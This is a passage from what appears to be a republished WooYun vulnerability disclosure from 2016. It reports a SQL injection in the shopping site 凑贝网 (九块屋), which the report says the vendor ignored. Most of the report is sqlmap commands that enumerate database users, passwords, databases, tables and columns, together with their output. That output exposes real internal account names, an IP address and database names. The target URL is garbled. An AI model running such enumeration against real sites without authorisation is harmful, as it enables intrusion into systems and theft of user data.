A SQL injection vulnerability in 凑贝网 (九块屋)

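admin, 2017-04-28 06:32:55
Summary

2016-03-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2016-04-21: The vendor has actively ignored the vulnerability; details disclosed to the public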

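Vulnerability overview

Bug ID: WooYun-2016-181709

Vulnerability title: A SQL injection vulnerability in 凑贝网 (九块屋)

Affected vendor: 凑贝网 (九块屋)

Reported by: @空空

Submitted: 2016-03-07 08:25

Disclosed: 2016-04-21 08:25

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: Vendor could not be contacted, or the vendor actively ignored the report

Source: www.wooyun.org; if you have questions or need help, please contact

Tags: none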


Vulnerability details

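Brief description:

RT

Detailed description:

An injection exists at the address http:m'

Code section
The database management system usernames and passwords can be listed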
sqlmap -u "http:m' --users
database management system users [10]:
[*] 'coubei.com'@'localhost'
[*] 'robot'@'182.140.221.239'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'iz23npqfiaoz'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 's_pikiw'@'localhost'
[*] 'taobaoke.com'@'localhost'
[*] 'wangyue.cc'@'localhost'

sqlmap -u "http:m' --password

database management system users password hashes:


Listing the database names with sqlmap gives the following
sqlmap -u "http:m' --dbs
available databases [18]:
[*] _jiukuaiwu
[*] apply
[*] coubei
[*] coubei_apply
[*] coubei_coubei
[*] coubei_goods
[*] coubei_jiukuaiwu
[*] coubei_users
[*] cuzhe
[*] information_schema
[*] mysql
[*] performance_schema
[*] t1
[*] t2
[*] t5
[*] taoniupindb
[*] test
[*] tmp
Listing the table names:
sqlmap -u "http:m' -D coubei_users --tables
Database: coubei_users
[48 tables]
sqlmap -u "http:m' -D coubei_users -tables pre_users --columns
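........ The output ends here.

Proof of vulnerability:

Same as above

Remediation:

Copyright notice: when reposting, please credit the source @空空@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined

Vulnerability Rank: 15 (WooYun rating)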

